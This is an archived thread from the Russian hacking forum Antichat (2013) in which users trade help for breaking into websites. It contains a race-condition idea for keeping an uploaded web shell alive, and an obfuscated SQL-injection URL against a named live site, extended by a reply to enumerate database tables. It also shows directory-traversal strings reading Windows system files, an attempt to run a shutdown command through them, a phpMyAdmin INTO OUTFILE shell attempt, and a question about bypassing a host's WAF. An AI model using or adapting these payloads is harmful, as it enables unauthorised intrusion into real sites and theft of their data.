ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.11.2013, 12:51
|
|
Новичок
Регистрация: 03.12.2008
Сообщений: 5
Провел на форуме:
597696
Репутация:
1
|
|
ребят,хелп
в админке одной CMS есть такой аплоад файлов:
Код:
Code:
if ($input->p['do'] == "install") {
if ($settings['demo'] == "yes") {
$error_msg = "This is not possible in demo version";
}
else {
if ($input->p['sesion_id'] != $_SESSION['sesion_id']) {
$error_msg = "Invalid token try again please";
}
else {
if ($_FILES['file']['type'] != "text/xml") {
$error_msg = "Invalid File";
}
else {
if (0 load("../upload/" . $_FILES['file']['name']);
$langnames = $doc->getElementsByTagName("name");
$langname = $langnames->item(0)->nodeValue;
$langversions = $doc->getElementsByTagName("ptcevolution");
$langversion = $langversions->item(0)->nodeValue;
$langfiles = $doc->getElementsByTagName("filename");
$langfile = $langfiles->item(0)->nodeValue;
if ((empty($$langname) || empty($$langversion)) || empty($$langfile)) {
$error_msg = "Invalid File";
}
else {
if ($langversion != $software['version']) {
$error_msg = $langname . " is not configured for PTCEvolution " . $software['version'];
}
else {
$verifylang = $db->fetchOne(("SELECT COUNT(*) AS NUM FROM language WHERE name='" . $langname . "' and version='" . $software['version'] . "'"));
if ($verifylang == 0) {
$datastored = array("name" => $langname, "version" => $langversion, "filename" => $langfile);
$insert = $db->insert("language", $datastored);
$success_msg = $langname . " was sucessfully installed! Click here to manage installed languages";
}
else {
$error_msg = $langname . " is already installed on this site.";
}
}
}
unlink("../upload/" . $_FILES['file']['name']);
}
}
}
}
}
то есть,если зайти под админом,подменить Content-type на text/xml и попробывать залить shell.php - он зальется в папку upload
Код:
Code:
move_uploaded_file($_FILES['file']['tmp_name'], "../upload/" . $_FILES['file']['name']);
но тут же удалится
Код:
Code:
unlink("../upload/" . $_FILES['file']['name']);
есть ли возможность задержать файл в папке /upload/ или же успеть выполнить код? |
|
|
19.11.2013, 13:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
343026
Репутация:
391
|
|
HeaVeNSeR
может попробывать, написать скрипт который нонстоп будет лить шел на сервер, а ты в браузере нонстоп будешь дергать шелл.
расскажешь потом получилось или нет)
|
|
|
|
19.11.2013, 15:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
2764
Репутация:
0
|
|
други помогите скуль докрутить, кое как обошел фильтры не могу теперь имена таблиц и юзеров вывести
Сообщение от None
http://www.founddoo.com/profile/viewitem/?view=1538&item=201'+/*!%0Dunion%0Dselect%0D*FROM(select%201)%20a1%20joi n%20(select%20version())%20a2%20join%20(select%203 )%20a3%20join%20(select%204)%20a4%20join%20(select %205)%20a5%20join%20(select%206)%20a6%20join%20(se lect%207)%20a7%20join%20(select%208)%20a8%20join%2 0(select%209)%20a9%20join%20(select%2010)%20a10%20 join%20(select%2011)%20a11%20join%20(select%2012)% 20a12*/+--+
|
|
|
|
19.11.2013, 16:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от andrxx
andrxx said:
други помогите скуль докрутить, кое как обошел фильтры не могу теперь имена таблиц и юзеров вывести
Обходится следующим способом:
Сообщение от None
www.founddoo.com/profile/viewitem/?view=1538&item=201'+/*!%0Dunion%0Dselect*FROM(select 1)a1 join(select 2)a2 join(select
table_name from(information_schema.tables)
)a3 join(select 4)a4 join(select 5)a5 join(select 6)a6 join(select 7)a7 join(select 8)a8 join(select 9)a9 join(select 10)a10 join(select 11)a11 join(select 12)a12*/+--+
Дальше сам.
|
|
|
|
19.11.2013, 21:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
6871
Репутация:
-3
|
|
Доброго времени суток,
есть сайт с возможностью просмотреть файлы из виндоувс папки, (Directory traversal vuln) например:
Код:
Code:
?action=../../../../../../../../../../windows/System.ini%00.jpg
Вопрос можно ли выполнить запрос к командной строке? например послать команду выключения.. пробывал так:
Код:
Code:
action=../../../../../../../../../../windows/system32/cmd.exe-shutdown%20-t%200%00.jpg
непомогло. помогите разобратся( |
|
|
|
21.11.2013, 15:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
1297
Репутация:
0
|
|
phpmyadmin
Пускает в админку phpmyadmin под любым логином, но после выполнения SQL запроса выдает:
Код:
Code:
Ответ MySQL: Документация
#1142 - SELECT command denied to user ''@'localhost' for table 'pma_bookmark'
При этом средствами phpmaydmin я могу создавать в таблице ячейки, менять их значение. Как нибудь можно повысить себе привилегии или залить шелл?
В ответ на
Код:
Code:
SELECT ''
FROM test
INTO OUTFILE '/usr/www/site/wwwfiles/phpmyadmin/s.php'
выдает:
Код:
Code:
Ответ MySQL: Документация
#1045 - Access denied for user ''@'localhost' (using password: NO)
Также есть уязвимость в phpmyadmin/export.php?what=sql, открывает sql.php в той же директории. Но при попытке выйти за пределы директории командой ../../../sql, открывает тот же файл. Две точки превращает в ./
|
|
|
|
21.11.2013, 19:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от chado
chado said:
Пускает в админку phpmyadmin под любым логином, но после выполнения SQL запроса выдает:
Код:
Code:
Ответ MySQL: Документация
#1142 - SELECT command denied to user ''@'localhost' for table 'pma_bookmark'
При этом средствами phpmaydmin я могу создавать в таблице ячейки, менять их значение. Как нибудь можно повысить себе привилегии или залить шелл?
В ответ на
Код:
Code:
SELECT ''
FROM test
INTO OUTFILE '/usr/www/site/wwwfiles/phpmyadmin/s.php'
выдает:
Код:
Code:
Ответ MySQL: Документация
#1045 - Access denied for user ''@'localhost' (using password: NO)
Также есть уязвимость в phpmyadmin/export.php?what=sql, открывает sql.php в той же директории. Но при попытке выйти за пределы директории командой ../../../sql, открывает тот же файл. Две точки превращает в ./ врятли ты как-то права сможешь повысить, а чё, сменить пасс админки через phpmyadmin и залится ам - не вариант?
|
|
|
|
22.11.2013, 10:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
1297
Репутация:
0
|
|
Сообщение от qaz
qaz said:
врятли ты как-то права сможешь повысить, а чё, сменить пасс админки через phpmyadmin и залится ам - не вариант?
Я походу вообще без прав в phpmyadmin. information_schema даже читать не могу, изменения могу вносить только в таблицу test. Думал может можно через изменение этой таблицы что нибудь да залить)
|
|
|
|
22.11.2013, 23:16
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Кто нибудь обходил waf хостинга hostgator.com на связку union select ?
|
|
|
|
23.11.2013, 23:48
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от kingbeef
kingbeef said:
Кто нибудь обходил waf хостинга hostgator.com на связку union select ?
Вылажите ссылку уязвимую сего хостинга, а потестив люди скажут, что да как...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
